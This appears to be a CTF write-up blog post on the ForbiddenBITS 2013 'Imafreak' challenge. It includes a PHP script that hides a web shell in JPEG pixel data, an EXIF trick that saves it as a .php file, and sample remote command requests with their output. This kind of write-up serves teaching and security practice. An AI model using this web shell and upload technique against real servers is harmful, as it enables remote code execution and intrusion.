Contenido principal

Imafreak - ForbiddenBITS 2013

Marzo 17, 2013

For this challenge, we were given a link to a website (http://192.73.237.131/) and a hint (Hint6[Freak]:~), there, we can upload and see JPEG images:

By following the hint, we can get the source code of view.php script (Using ~ to retrieve the content of the temporal file: http://192.73.237.131/view.php~).

Wild vulnerability appears in these lines:

        $filex="secretstoreddata/".md5(rand(0,100)).($camModel);
        $fp=fopen($filex, 'w');
        fwrite($fp, $dd);
        fclose($fp);

We can control $camModel variable by modifying EXIF data on the image, and $dd variable by making a JPEG that contains a shellcode in the red channel. The objetive here is to create a PHP script (camModel = .php) with custom shellcode:

<?php
// shellcode
$shell = '<?php system($_GET["c"]);die; ?>';
$width = strlen($shell);

// create image using true color
$img = imagecreatetruecolor($width, 1);
for ($x = 0; $x < $width; $x++) {
    // get ascii value of shellcode
    $value = ord($shell[$x]);
    // set a pixel using the ascii
    $color = imagecolorexact($img, $value, $value, $value);
    imagesetpixel($img, $x, 0, $color);
}

// save image using 100% quality
imagejpeg($img, 'imafreak.jpg', 100);

// add Model metadata using exiv2 tool
system('exiv2.exe -M "add Exif.Image.Model .php" imafreak.jpg');

The result of the script is this image (Right click, save target as, for better understanding):

By uploading the JPEG, we can execute commands on the server:

:arrow: List files in root folder
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=ls%20-lia%20../

total 344
7999660 drwxr-xr-x 9 root root   4096 Mar 16 13:46 .
7999659 drwxr-xr-x 6 root root   4096 Feb 15 15:35 ..
8000136 -rw-r--r-- 1 root root    164 Mar 14 21:01 confirmed.txt
7999914 drwxr-xr-x 2 root root   4096 Mar 16 07:29 css
7999917 drwxr-xr-x 6 root root   4096 Mar 16 07:30 css_pirobox
8000029 drwxr-xr-x 2 root root   4096 Mar 16 07:31 images
8000137 -rw-r--r-- 1 root root   2588 Mar 16 07:51 index.php
8000057 drwxr-xr-x 2 root root   4096 Mar 16 07:31 js
8000138 -rw-r--r-- 1 root root    741 Dec 28  2010 piecemaker.css
8000139 -rw-r--r-- 1 root root     39 Mar 14 21:13 robots.txt
8000123 drwxrwxrwx 2 root root  49152 Mar 17 23:52 secretstoreddata
8000140 -rw-r--r-- 1 root root     57 Mar 16 07:24 super_nooooo_flag_dafuq_is_this.php
8000141 -rw-r--r-- 1 root root   8153 Apr  4  2011 templatemo_style.css
8000126 drwxrwxrwx 2 root root 225280 Mar 17 23:52 upload
8000142 -rw-r--r-- 1 root root   3203 Mar 16 13:45 upload.php
8000143 -rw-r--r-- 1 root root   3464 Mar 16 12:02 view.php
8000144 -rw-r--r-- 1 root root   3589 Mar 16 12:02 view.php~
8000134 drwxr-xr-x 2 root root   4096 Mar 16 07:32 wehatebatman

:arrow: Read first flag
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=cat%20../super_nooooo_flag_dafuq_is_this.php

<?php
/*
FLAG : dafuq_is_this_shit_i_guess_its_flag
*/
?>

Unfortunately, we were unable to get the second flag, but after the competition, Phiber from Activalink, pointed us to the second flag, it was the first JPEG image uploaded using the imafreak service (http://192.73.237.131/upload/c4ca4238a0b923820dcc509a6f75849b.jpg):

Archivado en: Retos informáticos, Seguridad |

1 comentario

  1. ForbiddenBITS CTF 2013 | stephnix Marzo 22, 2013 @ 12:52 pm

    [...] http://www.sinfocol.org/2013/03/imafreak-forbiddenbits-2013/ [...]

Deja un comentario